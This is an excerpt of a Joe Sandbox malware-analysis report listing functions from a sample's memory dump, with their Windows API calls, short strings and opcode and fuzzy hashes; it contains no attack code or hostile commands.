Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
Instruction ID: 31586898d86c9dbae025b7c04a42a57f6921b23b12c39d643440399137ff39ec
Opcode Fuzzy Hash: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
Instruction Fuzzy Hash: 7EE092B5800604EFCB51AFE0D94D66DBFB5BB08311F248449F94AF7260DB389905EF50

Function 00B14D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B14ED4

Strings

*, xrefs: 00B14E10
LPT, xrefs: 00B14DFB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 242f87928a75de5f825e95e229244c4571c7ef90468f52ad588916b7a0cd7526
Instruction ID: 503c3641bef2ef37bca95aa7d9dfa8728f68a7dd51ecd9d51e3d53541dc50393
Opcode Fuzzy Hash: 242f87928a75de5f825e95e229244c4571c7ef90468f52ad588916b7a0cd7526
Instruction Fuzzy Hash: 05914E75A002049FCB14DF58C584EAABBF5EF49304F5980D9E40A9F3A2D735EE86CB91

Function 00ACE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00ACE30D

Strings

pow, xrefs: 00ACE2E5, 00ACE302

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
Instruction ID: 0951936a016ff3ccf52fb20f2fb460e6c6e25b35a06aeb124f0ed6375bbfb124
Opcode Fuzzy Hash: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
Instruction Fuzzy Hash: B6513A71A0C20296CB19F718CA42BBD3BA4AB40740F754D9EF0D7873A9FF358C959A46

Function 00ABE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00ABE1B1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
Instruction ID: 9a6222cd3d8cbfdeeee66695a2cdecff7aeae3941563a8362b014628a3fd1683
Opcode Fuzzy Hash: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
Instruction Fuzzy Hash: BC51353550428ADFDF15EFA8C0816FA7BB8EF26310F244065F9919B2E1DB349D42CBA0

Function 00ABF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00ABF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00ABF2BB

Strings

@, xrefs: 00ABF2AF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
Instruction ID: 7a44677deacfad1bf89c0fcebeefe454daa6035caae625874e02bcd1e6df3843
Opcode Fuzzy Hash: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
Instruction Fuzzy Hash: 355134714087449FE320AF14DD86BAFBBF8FB85710F81885DF199421A5EB708529CB66

Function 00B25745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00B257E0
_wcslen.LIBCMT ref: 00B257EC

Strings

CALLARGARRAY, xrefs: 00B257E6, 00B257EB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 3dc591f714f6e9ae0e541303745a38a9ea77629b2f1522a8273b336619a3d542
Instruction ID: 375bc85d92a00d12b43923cf3bc1a1b419d27738e0c5035382be02ab5b261ed6
Opcode Fuzzy Hash: 3dc591f714f6e9ae0e541303745a38a9ea77629b2f1522a8273b336619a3d542
Instruction Fuzzy Hash: BB41B331E001199FCB14DFA8D9819FEBBF9FF59320F1040A9E509AB291EB749D81CB90

Function 00B1D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B1D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B1D13A

Strings

|, xrefs: 00B1D10B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
Instruction ID: d76ca67f1c17f29550907ca2a8947d009a8d6640d7fc0ac1fa8d1a0c6ecd2d96
Opcode Fuzzy Hash: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
Instruction Fuzzy Hash: ED312C72D00219ABCF15EFA4CD85AEEBFB9FF09340F500059F815B61A1DB35AA56CB50

Function 00B3356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B33621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B3365C

Strings

static, xrefs: 00B335BC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c8e1cf686da276855b4f9aeb11c34b6d918f002e52f2679b7282c1593c632cd4
Instruction ID: bf73af9397943c3af09fedb5a8c14771149a7f2ea8737ac7b016bdefaab204ea
Opcode Fuzzy Hash: c8e1cf686da276855b4f9aeb11c34b6d918f002e52f2679b7282c1593c632cd4
Instruction Fuzzy Hash: 93319E71110604AEDB109F68DC81EFB73E9FF98B20F219619F8A5D7290DB30AD91C760

Function 00B34537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00B3461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B34634

Strings

', xrefs: 00B3458E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
Instruction ID: b44a47e0b78a1ccd07b497d0e4871f2626c4ffdcd7f151c0d10d7dba36af7889
Opcode Fuzzy Hash: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
Instruction Fuzzy Hash: 84312574A0020A9FDF14CFA9C981BDABBF5FF19300F2144AAE904AB381D770A941CF90

Function 00AA3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AE33A2

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA3A04

Strings

Line: , xrefs: 00AE33EB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 0c8acbb34372973b6f25b48b58b108df08078d371bf617d81b4bcad391608107
Instruction ID: 6ee7929052be2a5ba4590b35e3a00901c2ffea790ecf7f53a9c0d04f53d65f76
Opcode Fuzzy Hash: 0c8acbb34372973b6f25b48b58b108df08078d371bf617d81b4bcad391608107
Instruction Fuzzy Hash: CD31C472408300AACB21EB28DC46FEFB7E8AB45710F10491EF59A971D1DF749A48C7E6

Function 00B331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B3327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B33287

Strings

Combobox, xrefs: 00B33249

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
Instruction ID: ae116f3da42401ae605f9b6bf53252b0191ca3605b672505cbd35c291d707bdc
Opcode Fuzzy Hash: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
Instruction Fuzzy Hash: 7B11C8713002087FFF219F54DC81EBB37EAEB54764F204264F51897290D671DD518760

Function 00B33710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A

GetWindowRect.USER32(00000000,?), ref: 00B3377A
GetSysColor.USER32(00000012), ref: 00B33794

Strings

static, xrefs: 00B33757

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
Instruction ID: 2ae8dc0e7bb6453815c0d6eb7027c02bac08b637a7eb02813ee0fe598d4e764b
Opcode Fuzzy Hash: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
Instruction Fuzzy Hash: 9F1126B2610209AFDF00DFA8CC46EEA7BF8EB08714F114954F955E3250EB39E8619B60

Function 00B1CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B1CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B1CDA6

Strings

<local>, xrefs: 00B1CD66

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
Instruction ID: d8f6ebe54d571403eb9c7e6ee8aefe5f77eb39008ecb18bf861fe9e18336c103
Opcode Fuzzy Hash: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
Instruction Fuzzy Hash: E2110671281631BAD7344B669C84EE7BEECEF127A4F9042B6B11993090D7709980D6F0

Function 00B33429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B334AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B334BA

Strings

edit, xrefs: 00B3348F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
Instruction ID: 3e4d8b5bf286bb0f17690089dcbacb80bbb67416f0c9995b220b520e5bf307a9
Opcode Fuzzy Hash: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
Instruction Fuzzy Hash: 6F118F71100208ABEB124F64DC85AAB3BEAEB15B74F604764F965A72E0C771DC919B60

Function 00B06C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00B06CB6
_wcslen.LIBCMT ref: 00B06CC2

Strings

STOP, xrefs: 00B06CBC, 00B06CC1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
Instruction ID: f4ecf05cea2b1c3766c23eab6a0d7470449604d4b8f27bbf92dcf7b736d7d2cf
Opcode Fuzzy Hash: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
Instruction Fuzzy Hash: FF01C032A0052A8BEB21AFBDDD819BF7BE5EA65710B100679E862971D0EB31D960C650

Function 00B01CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B01D4C

Strings

ComboBox, xrefs: 00B01CEB
ListBox, xrefs: 00B01D16

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
Instruction ID: e5ef1873a167699f0ca0865b3e132cd28558856ffcfcc16ce396a3bf8dd1b544
Opcode Fuzzy Hash: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
Instruction Fuzzy Hash: C201B571601218ABCB18EFA4CD558FF7BE8EB46350B140A99F822672D1EA3459088660

Function 00B01BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B01C46

Strings

ComboBox, xrefs: 00B01BE5
ListBox, xrefs: 00B01C10

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
Instruction ID: d38bdbdc74cca1e322ea372c2a2a0688551e608d7c55a85df07b8c39f2b9ea7f
Opcode Fuzzy Hash: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
Instruction Fuzzy Hash: 5B01F7716801086BDB28EB94CA529FF7BE8DB16340F140499B406772C1EE24DE4886B1

Function 00B01C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B01CC8

Strings

ComboBox, xrefs: 00B01C69
ListBox, xrefs: 00B01C94

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
Instruction ID: ffd989195f0dac9a87e528556594b18fb59b74584fa5279a1ffaf539ebff1831
Opcode Fuzzy Hash: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
Instruction Fuzzy Hash: 4701DB7164011867DB28EB94CB55AFF7BECDB12380F140455B801772C1EE24DF18C671

Function 00B2747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B27493
_wcslen.LIBCMT ref: 00B274B9

Strings

3, 3, 16, 1, xrefs: 00B27483

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
